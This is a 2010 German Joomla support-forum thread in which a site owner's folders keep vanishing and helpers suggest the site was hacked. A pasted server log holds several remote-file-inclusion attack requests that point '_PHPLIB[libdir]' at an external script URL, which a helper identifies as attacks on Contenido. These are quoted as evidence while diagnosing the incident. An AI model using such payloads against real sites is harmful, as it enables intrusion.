Ordner verschwinden Bitte um Hilfe!!!

**frogprincess** · 21.02.2010 16:45

Hallo!

habe eine fertige Joomla Installation - funktionierte - bis plötzlich folgendes Phänomen auftrat:
nach ein paar Stunden verschwinden folgende Ornder:
administrator
components
language
in libraries: php mailer
in plugins authentication
modules
regform
templates

Der erste Gedanke war dass hier in Cronjob am Werk ist oder jemand die Ordner löscht (auch der Kunde hatte Zugriff) - allerdings gibt es keinen Cronjob zum Einstellen -. das PW wurde geändert - trotzdem tritt der Fehler auf...
Die Logfiles geben auch nichts her...
Das neue PW kann auch niemand anderer haben...

bitte um eure Hilfe ich bin schon höllisch mit den Nerven fertig

Danke im voraus - für die Lösung biete ich eine Abgeltung- Angebote erwünscht !!!
bin nicht unbedingt die Server-Expertin - der Webhoster (Webhost One) hat auch nichts
parat das helfen könnte.

Danke vorab

marioN

**flotte** · 21.02.2010 17:04

Versuch mal einen der verschwundenen Ordner mit FTP neu anzulegen. Wen es dabei eine Fehlermeldung gibt, wird der Ordner nicht gelöscht sein, sondern nur "unsichtbar" geworden sein - ggf. aufgrund der Rechte.
Was genau nun dieses Phänomen bewirkt hat kann man mit den bisherigen Infos nicht klären. Du solltest auf jeden Fall unverzüglich mit dem Provider Kontakt aufnehmen und das Problem schildern.

Wenn es so ist, das "irgendwas" Deine Ordner löscht oder die Rechte verändert, ist das zunächst einmal gleichmaßen fatal - sofern dies nicht vor Dir selbst kommt. Das bedeuted fast zwangsläufig, das Du "ungebetene Gäste" in Deinem Account hast. Vorgehensweise siehe dann hier. Aber nimm auch jeden Fall den Support des Hosters in Anspruch.

**Derroylo** · 21.02.2010 17:05

Hast du komplett alle Passwörter geändert? Welche Joomla Version?
Würde vermuten das die Seite gehackt wurde und du noch irgendein Script drin hast das dich ärgern soll.

**frogprincess** · 21.02.2010 17:41

Hallo!

Danke für die Anregungen - ich kann trotz eurer raschen Antwort nicht weiter - da ich nicht weiss wonach ich suchen soll - die logfiles enthalten auch nichts...
Ordner sind tatsächlich weg - nicht nur unsichtbar...
Das Passwort wurde ersetzt - das hat auch noch niemand ...
Super Admin bin auch nur ich ...
Der Hoster ist auch nicht hilfreich... sonst noch Ideen?

gglg

**oldlady** · 21.02.2010 17:53

Ein nicht hilfreicher hoster in so einem Fall ist ein Grund für eine sofortige Kündigung.

Welcher hoster ist das denn?

Falls du direkt auf die Datenbank kommst mit phpmyadmin, dann exportiere die Datenbankinhalte komplett und versuch herauszulesen, ob alles plausibel aussieht.
Sichere das jedenfalls.

Du könntest ein Unterverzeichnis in deinem WEBspace anlegen und dort eine Installation deiner Anwendung versuchen.. aber generell ist es das Problem deines hosters. Lass sich da nicht abwimmeln.

**C.A.M** · 21.02.2010 18:09

Hallo frogprincess,

also wen du noch nichts weiter als die Installation durchgeführt haben solltest, würde ich glaube ich erst einmal alles wieder löschen.

Alle FTP Ordner und auch die Datenbank !

Als nächstes würde ich dann alle Passwörter ändern vom FTP Zugang und auch vom PhpMyadmin !

Am besten Speicherst du dir erst einmal die Zugangsdaten nicht auf deinen Rechner ab zb. im Filezilla und deinen Browsern. Wer weis schon ob da nicht eventuell ein Trojaner was Spioniert hat !

Und dann erst eine neue DB anlegen, dann das komplette Joomlapaket wieder auf den Server laden und mit der Neuinstallation beginnen.

Das geht alles recht fix und du solltest dann auf der sicheren Seite sein.

Als nächstes solltest du eventuell deinen Adminbereich vom Joomla sichern, in dem du über deinen Webspaceadministrationsbereich einen Verzeichnisschutz einrichtest. Solltest du dieses nicht über den Webadminbereich einrichten können, kannst du dir HIER ein einfaches Tool, welches ich mal auf Flottes Seite über einen Link endekt habe dafür nutzen !

Viel Erfolg.

MfG, C.A.M .

**frogprincess** · 27.02.2010 18:34

Hallo Leute!

da ich von webhost auch keine hilfe erhielt habe ich nach und nach "alte sicherungen" hinaufgespielt...
nun findet sich in einem logfile dieser eintrag:

HTML-Code:

- - [27/Feb/2010:12:47:33 +0100] "GET /?_PHPLIB[libdir]=http://www.farmwinona.org/jackz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" quality-check.at
- - [27/Feb/2010:12:47:34 +0100] "GET /berater/front_content.php?idart=116/?_PHPLIB[libdir]=http://www.farmwinona.org/jackz/id1.txt? HTTP/1.1" 200 - "-" "Mozilla/5.0" quality-check.at
- - [27/Feb/2010:12:47:35 +0100] "GET /berater/?_PHPLIB[libdir]=http://www.farmwinona.org/jackz/id1.txt? HTTP/1.1" 200 - "-" "Mozilla/5.0" quality-check.at
- - [27/Feb/2010:12:48:49 +0100] "GET /berater/beratung.php?path=Leistun%20%E2%80%A6/?_PHPLIB[libdir]=http://www.farmwinona.org/jackz/id1.txt? HTTP/1.1" 200 - "-" "Mozilla/5.0" quality-check.at
- - [27/Feb/2010:12:50:03 +0100] "GET /berater/beratung.php?path=Leistungen/?_PHPLIB[libdir]=http://www.farmwinona.org/jackz/id1.txt? HTTP/1.1" 200 - "-" "Mozilla/5.0" quality-check.at
- - [27/Feb/2010:12:50:04 +0100] "GET /berater/front_content.php?path=Unternehmen/?_PHPLIB[libdir]=http://www.farmwinona.org/jackz/id1.txt? HTTP/1.1" 200 - "-" "Mozilla/5.0" quality-check.at

Es gibt aber die Unterverzeichnisse berater/beratung.php bzw. /Berater nicht!!!!
Bitte um eure Hilfe - ich vermute den Hack jetzt in der php-lib aber wie finde ich den?
Ich bin wirklich nur leidliche php-Programmiererin - und weiss nicht wo ich da ansetzen soll -vor allem da es das vz nicht wirklich im joomla main oder submenü gibt .
HABT IHR EINEN TIPP? BITTEEE ! ES IST ZUM AUS DER HAUT FAHREN!
danke vorab

**flotte** · 27.02.2010 22:16

Hattest Du mal das CMS "Contenido" installiert oder war es mal installiert? Die Links zeigen typische Angriffsszenarien auf Contenido.

**frogprincess** · 28.02.2010 07:04

hallo!
ja der Kunde hatte früher ein Contenido, allerdings nicht auf diesem Webspace.
es wurde aber Texte aus der frühereren Contenido installation übernommen!!!

Das ist ein toller Tip - aber wo soll ich suchen anfangen - es gibt keine Installationsdateienaus dem alten Contenido - lediglich Texte.
die frühere Domain pointet aber auf den neuen Webspace.

Bitte um einen Tip wo ich anfangen soll bzw. wie ich die Schwachstelle finde - kann diese in irgendwelchen Texten sein?

Danke vorab - vielleicht krieg ich ja bald meine nerven wieder - die liegen blank

lg

**flotte** · 28.02.2010 22:06

Wenn kein Contenido mehr da ist, gehen diese Attacken ins Leere. Sie ziegen jedoch sehr schön wie hartnäckig solche Schachstellen versucht werden auszunutzen... Sobald man einmal in den Hackerforen gelistet ist, komen die Burschen immer wieder.

Was ist Deinem Web passiert kann man unmöglich von außen erkennen. HIer gibt es nur die Logs. Die Websrverlogs und die FTP-Logs. Wie man bei Attacken vorgeht wurde ja bereits hier gepostet.

Thema: Ordner verschwinden Bitte um Hilfe!!!

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Ordner verschwinden Bitte um Hilfe!!!

Erhielt Danksagungen von:

Erhielt Danksagungen von:

Danke mal für die Antworten

Neuinstallation

Hackscript entdeckt?

Contenido: Texte wurden hineinkopiert

Lesezeichen

Lesezeichen

Berechtigungen